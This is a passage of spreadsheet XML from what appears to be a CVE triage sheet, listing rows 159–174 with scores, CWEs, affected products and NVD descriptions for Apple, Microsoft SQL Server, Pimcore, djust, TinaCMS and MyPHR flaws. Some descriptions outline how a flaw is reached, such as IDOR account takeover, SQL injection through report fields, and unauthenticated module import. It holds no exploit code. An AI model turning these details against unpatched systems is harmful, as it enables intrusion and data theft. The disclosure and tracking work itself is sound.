      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43686</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr"/>
      <c r="Q159" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>A use-after-free issue was addressed with improved memory management. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. Connecting to a malicious NFS server may lead to kernel memory corruption.</t>
        </is>
      </c>
      <c r="S159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43686</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43815</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr"/>
      <c r="Q160" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow was addressed with improved bounds checking. This issue is fixed in macOS Sequoia 15.7.8, macOS Sonoma 14.8.8, macOS Tahoe 26.6. Connecting to a malicious afpfs server may lead to kernel memory corruption.</t>
        </is>
      </c>
      <c r="S160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43815</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47094</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr"/>
      <c r="Q161" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>SIMAC MyPHR 1.1 contains an insecure direct object reference (IDOR) vulnerability that allows authenticated attackers to access and modify arbitrary employee records due to missing server-side ownership validation. Attackers can send a PUT request to the employee update endpoint with an arbitrary employee identifier and a controlled password value to take over target accounts, enumerate employee records, and retrieve sensitive personally identifiable information including private pay bulletins.</t>
        </is>
      </c>
      <c r="S161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47094</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55416</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr"/>
      <c r="Q162" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>Pimcore is an Open Source Data &amp; Experience Management Platform. Prior to 11.5.19, 12.3.10, and 2026.1.6, an authenticated user with reports_config permission can place attacker-controlled SQL fragments in the sql, from, where, and groupby fields of a Custom Reports configuration processed by bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php. The buildQueryString() method concatenates these values into a database query, while a blacklist omits dangerous constructs such as additional data-manipulation statements, comments, subqueries, and multiple statements. The getData() method also previously interpolated offset and limit values into a LIMIT clause without integer casting. Executing the configured report reaches fetchAllAssociative() with the constructed query and can disclose, modify, or delete arbitrary database data. This issue is fixed in versions 11.5.19, 12.3.10, and 2026.1.6.</t>
        </is>
      </c>
      <c r="S162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55416</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61599</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M163" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr"/>
      <c r="Q163" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, the djust live transport resolves the LiveView to mount from a client-supplied dotted path by calling `__import__(module_path, ...)`. The module is imported — running its top-level code (import side effects) — before the framework checks that the resolved object is a `LiveView` subclass and before any per-view authentication. The `LIVEVIEW_ALLOWED_MODULES` allowlist that should contain this is fail-open (`if allowed_modules:` — skipped when the setting is unset, the framework default) and uses loose `startswith` matching. An unauthenticated WebSocket client (the WS handshake does not require auth; per-view auth runs only after import + instantiate) can therefore send a `mount` / `live_redirect_mount` / `url_change` frame (or an SSE mount) with `view = "&lt;any.importable.module&gt;.AnyName"` and cause the server to import — and execute the top-level code of — any importable Python module by name. Version 1.0.7 fixes the issue with a fail-closed resolution gate (`djust._view_resolution.is_view_import_allowed`): a client view path resolves only if (a) its module is already loaded (`sys.modules` — so resolving runs no new code; URL-routed views loaded by URLconf at startup keep working with zero config) or (b) it matches `LIVEVIEW_ALLOWED_MODULES` on a module-segment boundary (explicit opt-in for lazily-imported views). The gate runs before `__import__` at all three sinks (+ defense-in-depth inside `_instantiate_view`). As a workaround, set `LIVEVIEW_ALLOWED_MODULES` to the narrow list of modules that contain your mountable LiveView classes. (Note: pre-patch the allowlist is `startswith`-matched and the import still precedes the subclass check, so this is mitigation, not a complete fix.)</t>
        </is>
      </c>
      <c r="S163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61599</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62706</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K164"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64" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr"/>
      <c r="Q164" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63506</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr"/>
      <c r="Q165" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>Tina is a headless content management system. Prior to @tinacms/auth 1.1.4 and next-tinacms-azure 15.0.1, isAuthorized accepts a request-controlled clientID and asks isUserAuthorized to validate the bearer token against that selected TinaCloud app instead of the self-hosted site's configured app. An attacker with any TinaCloud account can submit the attacker's own app ID and valid token to a victim endpoint, causing TinaCloudBackendAuthProvider or an affected media authorized callback to accept the attacker's verified status across the tenant boundary. The vulnerable logic is present in packages/@tinacms/auth/src/index.ts and packages/next-tinacms-azure/src/auth.ts. Successful exploitation permits media listing, reading, upload, or deletion and, when TinaCloudBackendAuthProvider is used, GraphQL read, create, update, and delete operations on the victim's content without a victim account or victim interaction. This vulnerability is fixed in @tinacms/auth 1.1.4 and next-tinacms-azure 15.0.1.</t>
        </is>
      </c>
      <c r="S165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63506</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65374</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr"/>
      <c r="Q166" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Connecting to a malicious WebDAV server may result in code execution.</t>
        </is>
      </c>
      <c r="S166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65374</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65390</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:safari, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr"/>
      <c r="Q167" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>An integer overflow was addressed with improved input validation. This issue is fixed in Safari 26.6.1, iOS 26.6.1 and iPadOS 26.6.1, macOS Tahoe 26.6.2, tvOS 27, visionOS 27, watchOS 27. Processing maliciously crafted web content may lead to memory corruption.</t>
        </is>
      </c>
      <c r="S167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65390</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65391</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:safari, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr"/>
      <c r="Q168" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in Safari 26.6.1, iOS 26.6.1 and iPadOS 26.6.1, macOS Tahoe 26.6.2, tvOS 27, visionOS 27, watchOS 27. Processing maliciously crafted web content may lead to memory corruption.</t>
        </is>
      </c>
      <c r="S168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65391</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66814</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K169" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr"/>
      <c r="Q169" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66814</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66818</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K170" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr"/>
      <c r="Q170" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>Improper privilege management in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66818</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66819</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K171" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr"/>
      <c r="Q171" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66819</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66820</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K172" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr"/>
      <c r="Q172" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66820</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67370</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K173" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr"/>
      <c r="Q173" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67370</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67373</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
